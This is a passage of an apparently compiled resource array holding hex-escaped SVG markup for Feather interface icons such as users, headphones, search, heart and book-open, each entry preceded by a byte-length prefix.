\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x73\x65\x72\x73\
\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x37\x20\x32\
\x31\x76\x2d\x32\x61\x34\x20\x34\x20\x30\x20\x30\x20\x30\x2d\x34\
\x2d\x34\x48\x35\x61\x34\x20\x34\x20\x30\x20\x30\x20\x30\x2d\x34\
\x20\x34\x76\x32\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x63\x69\
\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x39\x22\x20\x63\x79\x3d\x22\
\x37\x22\x20\x72\x3d\x22\x34\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\
\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x33\x20\x32\
\x31\x76\x2d\x32\x61\x34\x20\x34\x20\x30\x20\x30\x20\x30\x2d\x33\
\x2d\x33\x2e\x38\x37\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\
\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x36\x20\x33\x2e\x31\x33\x61\
\x34\x20\x34\x20\x30\x20\x30\x20\x31\x20\x30\x20\x37\x2e\x37\x35\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x8b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x68\x65\x61\x64\x70\
\x68\x6f\x6e\x65\x73\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x33\x20\x31\x38\x76\x2d\x36\x61\x39\x20\x39\x20\x30\x20\x30\
\x20\x31\x20\x31\x38\x20\x30\x76\x36\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\x20\x31\
\x39\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x20\x32\x68\
\x2d\x31\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\
\x76\x2d\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\
\x32\x68\x33\x7a\x4d\x33\x20\x31\x39\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x30\x20\x32\x20\x32\x68\x31\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x30\x20\x32\x2d\x32\x76\x2d\x33\x61\x32\x20\x32\x20\x30\
\x20\x30\x20\x30\x2d\x32\x2d\x32\x48\x33\x7a\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x15\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6e\x61\x76\x69\x67\
\x61\x74\x69\x6f\x6e\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x33\x20\x31\x31\x20\x32\x32\x20\
\x32\x20\x31\x33\x20\x32\x31\x20\x31\x31\x20\x31\x33\x20\x33\x20\
\x31\x31\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x43\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x61\x73\x74\x2d\
\x66\x6f\x72\x77\x61\x72\x64\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\
\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x33\x20\x31\x39\x20\
\x32\x32\x20\x31\x32\x20\x31\x33\x20\x35\x20\x31\x33\x20\x31\x39\
\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x70\x6f\x6c\
\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x20\x31\
\x39\x20\x31\x31\x20\x31\x32\x20\x32\x20\x35\x20\x32\x20\x31\x39\
\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x8d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x7a\x6f\x6f\x6d\x2d\
\x69\x6e\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\
\x31\x31\x22\x20\x63\x79\x3d\x22\x31\x31\x22\x20\x72\x3d\x22\x38\
\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x32\x31\x22\
\x20\x78\x32\x3d\x22\x31\x36\x2e\x36\x35\x22\x20\x79\x32\x3d\x22\
\x31\x36\x2e\x36\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x31\x22\x20\x79\x31\x3d\x22\
\x38\x22\x20\x78\x32\x3d\x22\x31\x31\x22\x20\x79\x32\x3d\x22\x31\
\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x31\x31\x22\x20\x78\
\x32\x3d\x22\x31\x34\x22\x20\x79\x32\x3d\x22\x31\x31\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xaf\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x69\x6c\x65\x2d\
\x70\x6c\x75\x73\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x31\x34\x20\x32\x48\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\
\x2d\x32\x20\x32\x76\x31\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x30\x20\x32\x20\x32\x68\x31\x32\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x30\x20\x32\x2d\x32\x56\x38\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x31\x34\x20\x32\x20\x31\x34\x20\x38\x20\x32\x30\
\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\
\x22\x31\x38\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\
\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x39\x22\x20\x79\x31\x3d\x22\x31\x35\x22\
\x20\x78\x32\x3d\x22\x31\x35\x22\x20\x79\x32\x3d\x22\x31\x35\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x73\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x68\x65\x61\x72\x74\
\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x30\x2e\x38\
\x34\x20\x34\x2e\x36\x31\x61\x35\x2e\x35\x20\x35\x2e\x35\x20\x30\
\x20\x30\x20\x30\x2d\x37\x2e\x37\x38\x20\x30\x4c\x31\x32\x20\x35\
\x2e\x36\x37\x6c\x2d\x31\x2e\x30\x36\x2d\x31\x2e\x30\x36\x61\x35\
\x2e\x35\x20\x35\x2e\x35\x20\x30\x20\x30\x20\x30\x2d\x37\x2e\x37\
\x38\x20\x37\x2e\x37\x38\x6c\x31\x2e\x30\x36\x20\x31\x2e\x30\x36\
\x4c\x31\x32\x20\x32\x31\x2e\x32\x33\x6c\x37\x2e\x37\x38\x2d\x37\
\x2e\x37\x38\x20\x31\x2e\x30\x36\x2d\x31\x2e\x30\x36\x61\x35\x2e\
\x35\x20\x35\x2e\x35\x20\x30\x20\x30\x20\x30\x20\x30\x2d\x37\x2e\
\x37\x38\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x62\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x7a\x6f\x6f\x6d\x2d\
\x6f\x75\x74\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\
\x22\x31\x31\x22\x20\x63\x79\x3d\x22\x31\x31\x22\x20\x72\x3d\x22\
\x38\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x32\x31\
\x22\x20\x78\x32\x3d\x22\x31\x36\x2e\x36\x35\x22\x20\x79\x32\x3d\
\x22\x31\x36\x2e\x36\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\
\x31\x31\x22\x20\x78\x32\x3d\x22\x31\x34\x22\x20\x79\x32\x3d\x22\
\x31\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x8c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x6c\x69\x67\x6e\
\x2d\x6c\x65\x66\x74\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x37\x22\x20\x79\x31\x3d\x22\x31\x30\x22\x20\x78\x32\x3d\
\x22\x33\x22\x20\x79\x32\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x31\x22\
\x20\x79\x31\x3d\x22\x36\x22\x20\x78\x32\x3d\x22\x33\x22\x20\x79\
\x32\x3d\x22\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x31\
\x34\x22\x20\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\x31\x34\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x37\x22\x20\x79\x31\x3d\x22\x31\x38\x22\x20\x78\
\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x75\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x65\x61\x74\x68\
\x65\x72\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x30\
\x2e\x32\x34\x20\x31\x32\x2e\x32\x34\x61\x36\x20\x36\x20\x30\x20\
\x30\x20\x30\x2d\x38\x2e\x34\x39\x2d\x38\x2e\x34\x39\x4c\x35\x20\
\x31\x30\x2e\x35\x56\x31\x39\x68\x38\x2e\x35\x7a\x22\x3e\x3c\x2f\
\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x36\x22\x20\x79\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x32\x22\
\x20\x79\x32\x3d\x22\x32\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x37\x2e\x35\x22\x20\
\x79\x31\x3d\x22\x31\x35\x22\x20\x78\x32\x3d\x22\x39\x22\x20\x79\
\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x34\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x65\x61\x72\x63\
\x68\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\
\x31\x22\x20\x63\x79\x3d\x22\x31\x31\x22\x20\x72\x3d\x22\x38\x22\
\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x32\x31\x22\x20\
\x78\x32\x3d\x22\x31\x36\x2e\x36\x35\x22\x20\x79\x32\x3d\x22\x31\
\x36\x2e\x36\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x53\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x6f\x6f\x6b\x2d\
\x6f\x70\x65\x6e\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x32\x20\x33\x68\x36\x61\x34\x20\x34\x20\x30\x20\x30\x20\x31\x20\
\x34\x20\x34\x76\x31\x34\x61\x33\x20\x33\x20\x30\x20\x30\x20\x30\
\x2d\x33\x2d\x33\x48\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x32\x20\x33\x68\x2d\
\x36\x61\x34\x20\x34\x20\x30\x20\x30\x20\x30\x2d\x34\x20\x34\x76\
\x31\x34\x61\x33\x20\x33\x20\x30\x20\x30\x20\x31\x20\x33\x2d\x33\
\x68\x37\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x15\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
